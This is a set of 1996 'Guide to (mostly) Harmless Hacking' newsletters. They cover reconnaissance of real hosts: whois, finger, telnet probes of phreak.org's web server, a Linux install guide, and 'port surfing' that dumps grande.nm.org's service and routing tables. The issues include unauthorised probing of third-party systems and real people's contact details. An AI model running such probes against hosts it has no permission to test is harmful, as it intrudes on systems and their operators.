Hall, Barbara (BH340) rain@PHREAK.ORG
408.262.4142
Record last updated on 06-Feb-96.
Record created on 30-Apr-95.
Domain servers in listed order:
PC.PPP.ABLECOM.NET 204.75.33.33
ASYLUM.ASYLUM.ORG 205.217.4.17
NS.NEXCHI.NET 204.95.8.2
Next I wait a few hours and ping phreak.org again. I discover it is now
alive. So now we have learned that the computer hosting phreak.org is
sometimes connected to the Internet and sometimes not. (In fact, later
probing shows that it is often down.)
I try telnetting to their login sequence:
telnet phreak.org
Trying 204.75.33.33 ...
Connected to phreak.org.
Escape character is '^]'.
______________ _______________________________ __
___ __ \__ / / /__ __ \__ ____/__ |__ //_/____________________ _
__ /_/ /_ /_/ /__ /_/ /_ __/ __ /| |_ ,< _ __ \_ ___/_ __ `/
_ ____/_ __ / _ _, _/_ /___ _ ___ | /| |__/ /_/ / / _ /_/ /
/_/ /_/ /_/ /_/ |_| /_____/ /_/ |_/_/ |_|(_)____//_/ _\__, /
/____/
;
Connection closed by foreign host.
Aha! Someone has connected the computer hosting phreak.org to the Internet!
The fact that this gives just ASCII art and no login prompt suggests that
this host computer does not exactly welcome the casual visitor. It may well
have a firewall that rejects attempted logins from anyone who telnets in
from a host that is not on its approved list.
Next I finger their technical contact:
finger rain@phreak.org
Its response is:
[phreak.org]
It then scrolled out some embarrassing ASCII art. Finger it yourself if you
really want to see it. I'd only rate it PG-13, however.
The fact that phreak.org runs a finger service is interesting. Since finger
is one of the best ways to crack into a system, we can conclude that either:
1) The phreak.org sysadmin is not very security-conscious, or
2) It is so important to phreak.org to send out insulting messages that the
sysadmin doesn't care about the security risk of running finger.
Since we have seen evidence of a fire wall, case 2 is probably true.
One of the Happy Hacker list members who helped me by reviewing this Guide,
William Ryan, decided to further probe phreak.org's finger port:
"I have been paying close attention to all of the "happy hacker" things that
you have posted. When I tried using the port 79 method on phreak.org, it
connects and then displays a hand with its middle finger raised and the
comment "UP YOURS." When I tried using finger, I get logged on and a
message is displayed shortly thereafter "In real life???""
Oh, this is just *too* tempting...ah, but let's keep out of trouble and just
leave that port 79 alone, OK?
Now how about their HTML port, which would provide access to any Web sites
hosted by phreak.org? We could just bring up a Web surfing program and take
a look. But we are hackers and hackers never do stuph the ordinary way.
Besides, I don't want to view dirty pictures and naughty words. So we check
to see if it is active with, you guessed it, a little port surfing:
telnet phreak.org 80
Here's what I get:
Trying 204.75.33.33 ...
Connected to phreak.org.
Escape character is '^]'.
HTTP/1.0 400 Bad Request
Server: thttpd/1.00
Content-type: text/html
Last-modified: Thu, 22-Aug-96 18:54:20 GMT
<HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD>
<BODY><H2>400 Bad Request</H2>
Your request '' has bad syntax or is inherently impossible to satisfy.
<HR>
<ADDRESS><A
HREF="http://www.acme.org/software/thttpd/">thttpd/1.00</A></ADDRESS
</BODY></HTML>
Connection closed by foreign host.
Now we know that phreak.org does have a web server on its host computer.
This server is called thttpd, version 1.0. We also may suspect that it is a
bit buggy!
What makes me think it is buggy? Look at the version number: 1.0. Also,
that's a pretty weird error message.
If I were the technical administrator for phreak.org, I would get a better
program running on port 80 before someone figures out how to break into root
with it. The problem is that buggy code is often a symptom of code that
takes the lazy approach of using calls to root. In the case of a Web server,
you want to give read-only access to remote users in any user's directories
of html files. So there is a huge temptation to use calls to root.
And a program with calls to root just might crash and dump you out into root.
************************
Newbie note: Root! It is the Valhalla of the hard-core cracker. "Root" is
the account on a multi-user computer which allows you to play god. You
become the "superuser"! It is the account from which you can enter and use
any other account, read and modify any file, run any program. With root
access, you can completely destroy all data on boring.ISP.net or any other
host on which you gain root. (I am *not* suggesting that you do so!)
*************************
Oh, this is just too tempting. I do one little experiment:
telnet phreak.org 80
This gives:
Trying 204.75.33.33 ...
Connected to phreak.org.
Escape character is '^]'.
Because the program on port 80 times out on commands in a second or less, I
was set up ready to do a paste to host command, which quickly inserted the
following command:
<ADDRESS><A
HREF="http://www.phreak.org/thttpd/">thttpd/1.00</A></ADDRESS</BODY></HTML>
This gives information on phreak.org's port 80 program:
HTTP/1.0 501 Not Implemented
Server: thttpd/1.00
Content-type: text/html
Last-modified: Thu, 22-Aug-96 19:45:15 GMT
<HTML><HEAD><TITLE>501 Not Implemented</TITLE></HEAD>
<BODY><H2>501 Not Implemented</H2>
The requested method '<ADDRESS><A' is not implemented by this server.
<HR>
<ADDRESS><A HREF="http://www.acme.org/software/thttpd/">thttpd/1.00</A></ADDRESS
</BODY></HTML>
Connection closed by foreign host.
All right, what is thttpd? I do a quick search on Altavista and get the answer:
A small, portable, fast, and secure HTTP server. The tiny/turbo/throttling
HTTP server does not fork and is very careful about memory...
But did the programmer figure out how to do all this without calls to root?
Just for kicks I try to access the acme.org URL and get the message "does
not have a DNS entry." So it's off-line, too. But whois tells me it is
registered with Internic. Hmm, this sounds even more like brand X software.
And it's running on a port. Break-in city! What a temptation...arghhh...
Also, once again we see an interesting split personality. The phreak.org
sysadmin cares enough about security to get a Web server advertised as
"secure." But that software shows major symptoms of being a security risk!
So what may we conclude? It looks like phreak.org does have a Web site. But
it is only sporadically connected to the Internet.
Now suppose that we did find something seriously bad news at phreak.org.
Suppose someone wanted to shut it down. Ah-ah-ah, don't touch that buggy
port 80! Or that tempting port 79! Ping in moderation, only!
********************************
You can go to jail note: Are you are as tempted as I am? These guys have
notorious cracker highway port 79 open, AND a buggy port 80! But, once
again, I'm telling you, it is against the law to break into non-public parts
of a computer. If you telnet over US state lines, it is a federal felony.
Even if you think there is something illegal on that thttpd server, only
someone armed with a search warrant has the right to look it over from the
root account.
********************************
First, if in fact there were a problem with phreak.org (remember, this is
just being used as an illustration) I would email a complaint to the
technical and administrative contacts of the ISPs that provide phreak.org's
connection to the Internet. So I look to see who they are:
whois PC.PPP.ABLECOM.NET
I get the response:
[No name] (PC12-HST)
Hostname: PC.PPP.ABLECOM.NET
Address: 204.75.33.33
System: Sun 4/110 running SunOS 4.1.3
Record last updated on 30-Apr-95
In this case, since there are no listed contacts, I would email
postmaster@ABLECOM.NET.
I check out the next ISP:
whois ASYLUM.ASYLUM.ORG
And get:
[No name] (ASYLUM4-HST)
Hostname: ASYLUM.ASYLUM.ORG
Address: 205.217.4.17
System: ? running ?
Record last updated on 30-Apr-96.
Again, I would email postmaster@ASYLUM.ORG
I check out the last ISP:
whois NS.NEXCHI.NET
And get:
NEXUS-Chicago (BUDDH-HST)
1223 W North Shore, Suite 1E
Chicago, IL 60626
Hostname: NS.NEXCHI.NET
Address: 204.95.8.2
System: Sun running Unix
Coordinator:
Torres, Walter (WT51) walter-t@MSN.COM
312-352-1200
Record last updated on 31-Dec-95.
So in this case I would email walter-t@MSN.COM with evidence of the
offending material. I would also email complaints to
postmaster@PC.PPP.ABLECOM.NET and postmaster@ ASYLUM.ASYLUM.ORG.
That's it. Instead of waging escalating hacker wars that can end up getting
people thrown in jail, document your problem with a Web site and ask those
who have the power to cut these guys off to do something. Remember, you can
help fight the bad guys of cyberspace much better from your computer than
you can from a jail cell.
*************************
Netiquette alert: If you are just burning with curiosity about whether
thttpd can be made to crash to root, *DON'T* run experiments on phreak.org's
computer. The sysadmin will probably notice all those weird accesses to port
80 on the shell log file. He or she will presume you are trying to break in,
and will complain to your ISP. You will probably lose your account.
*************************
*************************
Evil Genius note: The symptoms of being hackable that we see in thttpd are
the kind of intellectual challenge that calls for installing Linux on your
PC. Once you get Linux up you could install thttpd. Then you may experiment
with total impunity.
If you should find a bug in thttpd that seriously compromises the security
of any computer running it, then what do you do? Wipe the html files of
phreak.org? NO! You contact the Computer Emergency Response Team (CERT) at
http://cert.org with this information. They will send out an alert. You will
become a hero and be able to charge big bucks as a computer security
consultant. This is much more phun than going to jail. Trust me.
************************
OK, I'm signing off for this column. I look forward to your contributions to
this list. Happy hacking -- and don't get busted!
__________________________________________________________________
Want to share some kewl stuph? Tell me I'm terrific? Flame me? For the first
two, I'm at cmeinel@techbroker.com. Please direct flames to
dev/null@techbroker.com. Happy hacking!
_______________________________________________________
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly)
HARMLESS HACKING as long as you leave this notice at the end. To subscribe,
email cmeinel@techbroker.com with message "subscribe hacker
<joe.blow@boring.ISP.net>" substituting your real email address for Joe Blow's.
___________________________________________________________________
+256
View File
@@ -0,0 +1,256 @@
_____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 2
Linux!
______________________________________________________________
Unix has become the primo operating system of the Internet. In fact,
Unix is the most widely used operating system in the world among computers
with more power than PCs.
True, Windows NT is coming up fast as a common Internet operating system,
and is sooo wonderfully buggy that it looks like it could become the number
one favorite to crack into. But today Unix in all its wonderful flavors
still is the operating system to know in order to be a truly elite hacker.
So far we have assumed that you have been hacking using a shell
account that you get through your Internet Service Provider (ISP). A shell
account allows you to give Unix commands on one of your ISP's computers. But
you don't need to depend on your ISP for a machine that lets you play with
Unix. You can run Unix on your own computer and with a SLIP or PPP
connection be directly connected to the Internet.
***********************
Newbie note: Serial Line Internet Protocol (SLIP) and Point-to-Point
Protocol (PPP) connections give you a temporary Internet Protocol (IP)
address that allows you to be hooked directly to the Internet. You have to
use either SLIP or PPP connections to get to use a Web browser that gives
you pictures instead on text only. So if you can see pictures on the Web,
you already have one of these available to you.
The advantage of using one of these direct connections for your
hacking activities is that you will not leave behind a shell log file for
your ISP's sysadmin to pore over. Even if you are not breaking the law, a
shell log file that shows you doing lots of hackerish stuph can be enough
for some sysadmins to summarily close your account.
********************
What is the best kind of computer to run Unix on? Unless you are a
wealthy hacker who thinks nothing of buying a Sun SPARC workstation, you'll
probably do best with some sort of PC. There are almost countless variants
of Unix that run on PCs. Most of them are free for download, or
inexpensively available on CD-ROMs.
The three primary variations of Unix that run on PCs are Sun's
Solaris, FreeBSD and Linux. Solaris costs around $700. Enough said. FreeBSD
is really, really good but doesn't offer a lot of support. Linux, however,
has the advantage of being available in many variants (so you can have fun
mixing and matching programs from different Linux offerings). Most
importantly, Linux is supported by many news groups, mail lists and Web
sites. If you have hacker friends in your area, most of them probably use
Linux and can help you out.
*********************
Historical note: Linux was created in 1991 by a group led by Linus Torvalds
of the University of Helsinki. Linux is copyrighted under the GNU General
Public License. Under this agreement, Linux may be redistributed to anyone
along with the source code. Anyone can sell any variant of Linux and modify
it and repackage it. But even if someone modifies the source code he or she
may not claim copyright for anything created from Linux. Anyone who sells a
modified version of Linux must provide source code to the buyers and allow
them to reuse it in their commercial products without charging licensing
fees. This arrangement is known as a "copyleft."
Under this arrangement the original creators of Linux receive no
licensing or shareware fees. Linus Torvalds and the many others who have
contributed to Linux have done so from the joy of programming and a sense of
community with all of us who will hopefully use Linux in the spirit of good
guy hacking. Viva la Linux! Viva Torvalds!
**********************
Linux consists of the operating system itself (called the "kernel")
plus a set of associated programs.
The kernel, like all types of Unix, is a multitasking, multi-user
operating system. Although it uses a different file structure, and hence is
not directly compatible with DOS and Windows, it is so flexible that many
DOS and Windows programs can be run while in Linux. So a power user will
probably want to boot up in Linux and then be able to run DOS and Windows
programs from Linux.
Associated programs that come with most Linux distributions may include:
* a shell program (Bourne Again Shell -- BASH -- is most common);
* compilers for programming languages such as Fortran-77 (my favorite!), C,
C++, Pascal, LISP, Modula-2, Ada, Basic (the best language for a beginner),
and Smalltalk.;
* X (sometimes called X-windows), a graphical user interface
* utility programs such as the email reader Pine (my favorite) and Elm
Top ten reasons to install Linux on your PC:
1. When Linux is outlawed, only outlaws will own Linux.
2. When installing Linux, it is so much fun to run fdisk without backing up
first.
3. The flames you get from asking questions on Linux newsgroups are of a
higher quality than the flames you get for posting to alt.sex.bestiality.
4. No matter what flavor of Linux you install, you'll find out tomorrow
there was a far more 3l1te version you should have gotten instead.
5. People who use Free BSD or Solaris will not make fun of you. They will
offer their sympathy instead.
6. At the next Def Con you'll be able to say stuph like "so then I su-ed to
his account and grepped all his files for 'kissyface'." Oops, grepping
other people's files is a no-no, forget I ever suggested it.
7. Port surf in privacy.
8. One word: scripts.
9. Installing Linux on your office PC is like being a postal worker and
bringing an Uzi to work.
10. But - - if you install Linux on your office computer, you boss won't
have a clue what that means.
What types of Linux work best? It depends on what you really want.
Redhat Linux is famed for being the easiest to install. The Walnut Creek
Linux 3.0 CD-ROM set is also really easy to install -- for Linux, that is!
My approach has been to get lots of Linux versions and mix and match the
best from each distribution.
I like the Walnut Creek version best because with my brand X
hardware, its autodetection feature was a life-saver.
INSTALLING LINUX is not for the faint of heart! Several tips for
surviving installation are:
1) Although you in theory can run Linux on a 286 with 4 MB RAM and two
floppy drives, it is *much* easier with a 486 or above with 8 MB RAM, a
CD-ROM, and at least 200 MB free hard disk space.
2) Know as much as possible about what type of mother board, modem, hard
disk, CD-ROM, and video card you have. If you have any documentation for
these, have them on hand to reference during installation.
3) It works better to use hardware that is name-brand and somewhat out of
date on your computer. Because Linux is freeware, it doesn't offer device
drivers for all the latest hardware. And if your hardware is like mine --
lots of Brand X and El Cheapo stuph, you can take a long time experimenting
with what drivers will work.
4) Before beginning installation, back up your hard disk(s)! In theory you
can install Linux without harming your DOS/Windows files. But we are all
human, especially if following the advice of 3).
5) Get more than one Linux distribution. The first time I successfully
installed Linux, I finally hit on something that worked by using the boot
disk from one distribution with the CD-ROM for another. In any case, each
Linux distribution had different utility programs, operating system
emulators, compilers and more. Add them all to your system and you will be
set up to become beyond elite.
6) Buy a book or two or three on Linux. I didn't like any of them! But they
are better than nothing. Most books on Linux come with one or two CD-ROMs
that can be used to install Linux. But I found that what was in the books
did not exactly coincide with what was on the CD-ROMs.
7) I recommend drinking while installing. It may not make debugging go any
faster, but at least you won't care how hard it is.
Now I can almost guarantee that even following all these 6 pieces of
advice, you will still have problems installing Linux. Oh, do I have 7
advisories up there? Forget number 7. But be of good cheer, since everyone
else also suffers mightily when installing and using Linux, the Internet has
an incredible wealth of resources for the Linux-challenged.
If you are allergic to getting flamed, you can start out with Linux
support Web sites.
The best I have found is http://sunsite.unc.edu:/pub/Linux/. It
includes the Linux Frequently Asked Questions list (FAQ), available from
sunsite.unc.edu:/pub/Linux/docs/FAQ.
In the directory /pub/Linux/docs on sunsite.unc.edu you'll find a
number of other documents about Linux, including the Linux INFO-SHEET and
META-FAQ,
The Linux HOWTO archive is on sunsite.unc.edu:/pub/Linux/docs/HOWTO.
The directory /pub/Linux/docs/LDP on sunsite.unc.edu contains the current
set of LDP manuals.
You can get ``Linux Installation and Getting Started'' from
sunsite.unc.edu in /pub/Linux/docs/LDP/install-guide. The README file
there describes how you can order a printed copy of the book of the same
name (about 180 pages).
Now if you don't mind getting flamed, you may want to post questions
to the amazing number of Usenet news groups that cover Linux. These include:
comp.os.linux.advocacy Benefits of Linux compared
comp.os.linux.development.system Linux kernels, device drivers
comp.os.linux.x Linux X Window System servers
comp.os.linux.development.apps Writing Linux applications
comp.os.linux.hardware Hardware compatibility
comp.os.linux.setup Linux installation
comp.os.linux.networking Networking and communications
comp.os.linux.answers FAQs, How-To's, READMEs, etc.
linux.redhat.misc
alt.os.linux Use comp.os.linux.* instead
alt.uu.comp.os.linux.questions Usenet University helps you
comp.os.linux.announce Announcements important to Linux
comp.os.linux.misc Linux-specific topics
Tobin Fricke has also pointed out that "free copies of Linux CD-ROMs
are available the Linux Support & CD Givaway web site at
http://emile.math.ucsb.edu:8000/giveaway.html. This is a project where
people donate Linux CD's that they don't need any more. The project was
seeded by Linux Systems Labs, who donated 800 Linux CDs initially! Please
remember to donate your Linux CD's when you are done with them. If you live
near a computer swap meet, Fry's, Microcenter, or other such place, look for
Linux CD's there. They are usually under $20, which is an excellent
investment. I personally like the Linux Developer's Resource by Infomagic,
which is now up to a seven CD set, I believe, which includes all major Linux
distributions (Slackware, Redhat, Debian, Linux for DEC Alpha to name a few)
plus mirrors of tsx11.mit.edu and sunsite.unc.edu/pub/linux plus much more.
You should also visit the WONDERFUL linux page at
http://sunsite.unc.edu/linux, which has tons of information, as well as the
http://www.linux.org/. You might also want to check out
http://www.redhat.com/ and http://www.caldera.com/ for more information on
commercial versions of linux (which are still freely available under GNU)."
How about Linux security? Yes, Linux, like every operating system,
is imperfect. Eminently hackable, if you really want to know. So if you want
to find out how to secure your Linux system, or if you should come across
one of the many ISPs that use Linux and want to go exploring (oops, forget I
wrote that), here's where you can go for info:
ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks
ftp://info.cert.org/pub/tech_tips/root_compromise
http://bach.cis.temple.edu/linux/linux-security/
Last but not least, if you want to ask Linux questions on the Happy
Hacker list, you're welcome. We may be the blind leading the blind, but what
the heck!
_________________________________________________________
Want to see back issues of Guide to (mostly) Harmless Hacking? See
http://www.feist.com/~tqdb/evis-unv.html. Want to subscribe to this list?
Email majordomo@edm.net with the message "subscribe happyhacker." Want to
share some kewl stuph with the Happy Hacker list? Send your messages to
hh@edm.net. To send me confidential email (please, no discussions of
illegal activities) use cmeinel@techbroker.com. Please direct flames to
dev/null@techbroker.com. Happy hacking!
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly)
HARMLESS HACKING as long as you leave this notice at the end..
________________________________________________________
--------------------------------------------------------------------
This message is from the HappyHacker mailing list. To unsubscribe,
send mail to majordomo@edm.net saying "unsubscribe happyhacker". The
HappyHacker page is at http://www.feist.com/~tqdb/evis-unv.html. This
mailing list is provided by The EDM Network (http://www.edm.net/) as
a public service and is not responsible for its content.
--------------------------------------------------------------------
Carolyn Meinel
M/B Research -- The Technology Brokers
+698
View File
@@ -0,0 +1,698 @@
_____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 4
More intro to TCP/IP: port surfing! Daemons! How to get on almost any
computer without logging in and without breaking the law. Impress your
clueless friends and actually discover kewl, legal, safe stuph. I'll bet
se7en doesn't know how to do all this...
______________________________________________________________
A few days ago I had a lady friend visiting. She's 42 and doesn't own a
computer. However, she is taking a class on personal computers at a
community college. She wanted to know what all this hacking stuph is about.
So I decided to introduce her to port surfing. And while doing it, we
stumbled across something kewl.
Port surfing takes advantage of the structure of TCP/IP. This is the
protocol (set of rules) used for computers to talk to each other over the
Internet. One of the basic principles of Unix (the most popular operating
system on the Internet) is to assign a "port" to every function that one
computer might command another to perform. Common examples are to send and
receive email, read Usenet newsgroups, telnet, transfer files, and offer Web
pages.
************************
Newbie note #1: A computer port is a place where information goes in or out
of it. On your home computer, examples of ports are your monitor, which
sends information out, your keyboard and mouse, which send information in,
and your modem, which sends information both out and in.
But an Internet host computer such as callisto.unm.edu has many more ports
than a typical home computer. These ports are identified by numbers. Now
these are not all physical ports, like a keyboard or RS232 serial port (for
your modem). They are virtual (software) ports.
************************
So if you want to read a Web page, your browser contacts port number 80 and
tells the computer that manages that Web site to let you in. And, sure
enough, you get into that Web server computer without a password.
OK, big deal. That's pretty standard for the Internet. Many -- most --
computers on the Internet will let you do some things with them without
needing a password.
However, the essence of hacking is doing things that aren't obvious. That
don't just jump out at you from the manuals. One way you can move a step up
from the run of the mill computer user is to learn how to port surf. I'll
bet you won't find port surfing in a Unix manual.
The essence of port surfing is to pick out a target computer and explore it
to see what ports are open and what you can do with them.
Now if you are a lazy hacker you can use canned hacker tools such as Satan
or Netcat. These are programs you can run from Linux, FreeBSD or Solaris
(all types of Unix) from your PC. They automatically scan your target
computers. They will tell you what ports are in use. They will also probe
these ports for presence of daemons with known security flaws, and tell
you what they are.
********************************
Newbie note # 2: A daemon is not some sort of grinch or gremlin or 666 guy.
It is a program that runs in the background on many (but not all) Unix
system ports. It waits for you to come along and use it. If you find a
daemon on a port, it's probably hackable. Some hacker tools will tell you
what the hackable features are of the daemons they detect.
********************************
However, there are several reasons to surf ports by hand instead of
automatically.
1) You will learn something. Probing manually you get a gut feel for how the
daemon running on that port behaves. It's the difference between watching an
x-rated movie and (blush).
2) You can impress your friends. If you run a canned hacker tool like Satan
your friends will look at you and say, "Big deal. I can run programs, too."
They will immediately catch on to the dirty little secret of the hacker
world. Most hacking exploits are just lamerz running programs they picked up
from some BBS or ftp site. But if you enter commands keystroke by keystroke
your friends will see you using your brain. And you can help them play with
daemons, too, and give them a giant rush.
3) The truly elite hackers surf ports and play with daemons by hand because
it is the only way to discover something new. There are only a few hundred
hackers -- at most -- who discover new stuph. The rest just run canned
exploits over and over and over again. Boring. But port surfing by hand
is on the path to the pinnacle of hackerdom.
Now let me tell you what my middle-aged friend and I discovered while just
messing around.
First, we decided we didn't want to waste our time messing with some minor
little host computer. Hey, let's go for the big time!
So how do you find a big kahuna computer on the Internet? We started with a
domain which consisted of a LAN of PCs running Linux that I happened to
already know about, that is used by the New Mexico Internet Access ISP:
nmia.com.
*****************************
Newbie Note # 3: A domain is an Internet address. You can use it to look up
who runs the computers used by the domain, and also to look up how that
domain is connected to the rest of the Internet.
*****************************
So to do this we first logged into my shell account with Southwest
Cyberport. I gave the command:
<slug> [66] ->whois nmia.com
New Mexico Internet Access (NMIA-DOM)
2201 Buena Vista SE
Albuquerque, NM 87106
Domain Name: NMIA.COM
Administrative Contact, Technical Contact, Zone Contact:
Orrell, Stan (SO11) SAO@NMIA.COM
(505) 877-0617
Record last updated on 11-Mar-94.
Record created on 11-Mar-94.
Domain servers in listed order:
NS.NMIA.COM 198.59.166.10
GRANDE.NM.ORG 129.121.1.2
Now it's a good bet that grande.nm.org is serving a lot of other Internet
hosts beside nmia.com. Here's how we port surfed our way to find this out:
<slug> [67] ->telnet grande.nm.org 15
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
TGV MultiNet V3.5 Rev B, VAX 4000-400, OpenVMS VAX V6.1
Product License Authorization Expiration Date
---------- ------- ------------- ---------------
MULTINET Yes A-137-1641 (none)
NFS-CLIENT Yes A-137-113237 (none)
*** Configuration for file "MULTINET:NETWORK_DEVICES.CONFIGURATION" ***
Device Adapter CSR Address Flags/Vector
------ ------- ----------- ------------
se0 (Shared VMS Ethernet/FDDI) -NONE- -NONE- -NONE-
MultiNet Active Connections, including servers:
Proto Rcv-Q Snd-Q Local Address (Port) Foreign Address (Port) State
----- ----- ----- ------------------ ------------------ -----
TCP 0 822 GRANDE.NM.ORG(NETSTAT) 198.59.115.24(1569) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(POP3) 164.64.201.67(1256) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(4918) 129.121.254.5(TELNET) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(TELNET) AVATAR.NM.ORG(3141) ESTABLISHED
TCP 0 0 *(NAMESERVICE) *(*) LISTEN
TCP 0 0 *(TELNET) *(*) LISTEN
TCP 0 0 *(FTP) *(*) LISTEN
TCP 0 0 *(FINGER) *(*) LISTEN
TCP 0 0 *(NETSTAT) *(*) LISTEN
TCP 0 0 *(SMTP) *(*) LISTEN
TCP 0 0 *(LOGIN) *(*) LISTEN
TCP 0 0 *(SHELL) *(*) LISTEN
TCP 0 0 *(EXEC) *(*) LISTEN
TCP 0 0 *(RPC) *(*) LISTEN
TCP 0 0 *(NETCONTROL) *(*) LISTEN
TCP 0 0 *(SYSTAT) *(*) LISTEN
TCP 0 0 *(CHARGEN) *(*) LISTEN
TCP 0 0 *(DAYTIME) *(*) LISTEN
TCP 0 0 *(TIME) *(*) LISTEN
TCP 0 0 *(ECHO) *(*) LISTEN
TCP 0 0 *(DISCARD) *(*) LISTEN
TCP 0 0 *(PRINTER) *(*) LISTEN
TCP 0 0 *(POP2) *(*) LISTEN
TCP 0 0 *(POP3) *(*) LISTEN
TCP 0 0 *(KERBEROS_MASTER) *(*) LISTEN
TCP 0 0 *(KLOGIN) *(*) LISTEN
TCP 0 0 *(KSHELL) *(*) LISTEN
TCP 0 0 GRANDE.NM.ORG(4174) OSO.NM.ORG(X11) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(4172) OSO.NM.ORG(X11) ESTABLISHED
TCP 0 0 GRANDE.NM.ORG(4171) OSO.NM.ORG(X11) ESTABLISHED
TCP 0 0 *(FS) *(*) LISTEN
UDP 0 0 *(NAMESERVICE) *(*)
UDP 0 0 127.0.0.1(NAMESERVICE) *(*)
UDP 0 0 GRANDE.NM.OR(NAMESERV) *(*)
UDP 0 0 *(TFTP) *(*)
UDP 0 0 *(BOOTPS) *(*)
UDP 0 0 *(KERBEROS) *(*)
UDP 0 0 127.0.0.1(KERBEROS) *(*)
UDP 0 0 GRANDE.NM.OR(KERBEROS) *(*)
UDP 0 0 *(*) *(*)
UDP 0 0 *(SNMP) *(*)
UDP 0 0 *(RPC) *(*)
UDP 0 0 *(DAYTIME) *(*)
UDP 0 0 *(ECHO) *(*)
UDP 0 0 *(DISCARD) *(*)
UDP 0 0 *(TIME) *(*)
UDP 0 0 *(CHARGEN) *(*)
UDP 0 0 *(TALK) *(*)
UDP 0 0 *(NTALK) *(*)
UDP 0 0 *(1023) *(*)
UDP 0 0 *(XDMCP) *(*)
MultiNet registered RPC programs:
Program Version Protocol Port
------- ------- -------- ----
PORTMAP 2 TCP 111
PORTMAP 2 UDP 111
MultiNet IP Routing tables:
Destination Gateway Flags Refcnt Use Interface MTU
---------- ---------- ----- ------ ----- --------- ----
198.59.167.1 LAWRII.NM.ORG Up,Gateway,H 0 2 se0 1500
166.45.0.1 ENSS365.NM.ORG Up,Gateway,H 0 4162 se0 1500
205.138.138.1 ENSS365.NM.ORG Up,Gateway,H 0 71 se0 1500
204.127.160.1 ENSS365.NM.ORG Up,Gateway,H 0 298 se0 1500
127.0.0.1 127.0.0.1 Up,Host 5 1183513 lo0 4136
198.59.167.2 LAWRII.NM.ORG Up,Gateway,H 0 640 se0 1500
192.132.89.2 ENSS365.NM.ORG Up,Gateway,H 0 729 se0 1500
207.77.56.2 ENSS365.NM.ORG Up,Gateway,H 0 5 se0 1500
204.97.213.2 ENSS365.NM.ORG Up,Gateway,H 0 2641 se0 1500
194.90.74.66 ENSS365.NM.ORG Up,Gateway,H 0 1 se0 1500
204.252.102.2 ENSS365.NM.ORG Up,Gateway,H 0 109 se0 1500
205.160.243.2 ENSS365.NM.ORG Up,Gateway,H 0 78 se0 1500
202.213.4.2 ENSS365.NM.ORG Up,Gateway,H 0 4 se0 1500
202.216.224.66 ENSS365.NM.ORG Up,Gateway,H 0 113 se0 1500
192.132.89.3 ENSS365.NM.ORG Up,Gateway,H 0 1100 se0 1500
198.203.196.67 ENSS365.NM.ORG Up,Gateway,H 0 385 se0 1500
160.205.13.3 ENSS365.NM.ORG Up,Gateway,H 0 78 se0 1500
202.247.107.131 ENSS365.NM.ORG Up,Gateway,H 0 19 se0 1500
198.59.167.4 LAWRII.NM.ORG Up,Gateway,H 0 82 se0 1500
128.148.157.6 ENSS365.NM.ORG Up,Gateway,H 0 198 se0 1500
160.45.10.6 ENSS365.NM.ORG Up,Gateway,H 0 3 se0 1500
128.121.50.7 ENSS365.NM.ORG Up,Gateway,H 0 3052 se0 1500
206.170.113.8 ENSS365.NM.ORG Up,Gateway,H 0 1451 se0 1500
128.148.128.9 ENSS365.NM.ORG Up,Gateway,H 0 1122 se0 1500
203.7.132.9 ENSS365.NM.ORG Up,Gateway,H 0 14 se0 1500
204.216.57.10 ENSS365.NM.ORG Up,Gateway,H 0 180 se0 1500
130.74.1.75 ENSS365.NM.ORG Up,Gateway,H 0 10117 se0 1500
206.68.65.15 ENSS365.NM.ORG Up,Gateway,H 0 249 se0 1500
129.219.13.81 ENSS365.NM.ORG Up,Gateway,H 0 547 se0 1500
204.255.246.18 ENSS365.NM.ORG Up,Gateway,H 0 1125 se0 1500
160.45.24.21 ENSS365.NM.ORG Up,Gateway,H 0 97 se0 1500
206.28.168.21 ENSS365.NM.ORG Up,Gateway,H 0 2093 se0 1500
163.179.3.222 ENSS365.NM.ORG Up,Gateway,H 0 315 se0 1500
198.109.130.33 ENSS365.NM.ORG Up,Gateway,H 0 1825 se0 1500
199.224.108.33 ENSS365.NM.ORG Up,Gateway,H 0 11362 se0 1500
203.7.132.98 ENSS365.NM.ORG Up,Gateway,H 0 73 se0 1500
198.111.253.35 ENSS365.NM.ORG Up,Gateway,H 0 1134 se0 1500
206.149.24.100 ENSS365.NM.ORG Up,Gateway,H 0 3397 se0 1500
165.212.105.106 ENSS365.NM.ORG Up,Gateway,H 0 17 se0 1006
205.238.3.241 ENSS365.NM.ORG Up,Gateway,H 0 69 se0 1500
198.49.44.242 ENSS365.NM.ORG Up,Gateway,H 0 25 se0 1500
194.22.188.242 ENSS365.NM.ORG Up,Gateway,H 0 20 se0 1500
164.64.0 LAWRII.NM.ORG Up,Gateway 1 40377 se0 1500
0.0.0 ENSS365.NM.ORG Up,Gateway 2 4728741 se0 1500
207.66.1 GLORY.NM.ORG Up,Gateway 0 51 se0 1500
205.166.1 GLORY.NM.ORG Up,Gateway 0 1978 se0 1500
204.134.1 LAWRII.NM.ORG Up,Gateway 0 54 se0 1500
204.134.2 GLORY.NM.ORG Up,Gateway 0 138 se0 1500
192.132.2 129.121.248.1 Up,Gateway 0 6345 se0 1500
204.134.67 GLORY.NM.ORG Up,Gateway 0 2022 se0 1500
206.206.67 GLORY.NM.ORG Up,Gateway 0 7778 se0 1500
206.206.68 LAWRII.NM.ORG Up,Gateway 0 3185 se0 1500
207.66.5 GLORY.NM.ORG Up,Gateway 0 626 se0 1500
204.134.69 GLORY.NM.ORG Up,Gateway 0 7990 se0 1500
207.66.6 GLORY.NM.ORG Up,Gateway 0 53 se0 1500
204.134.70 LAWRII.NM.ORG Up,Gateway 0 18011 se0 1500
192.188.135 GLORY.NM.ORG Up,Gateway 0 5 se0 1500
206.206.71 LAWRII.NM.ORG Up,Gateway 0 2 se0 1500
204.134.7 GLORY.NM.ORG Up,Gateway 0 38 se0 1500
199.89.135 GLORY.NM.ORG Up,Gateway 0 99 se0 1500
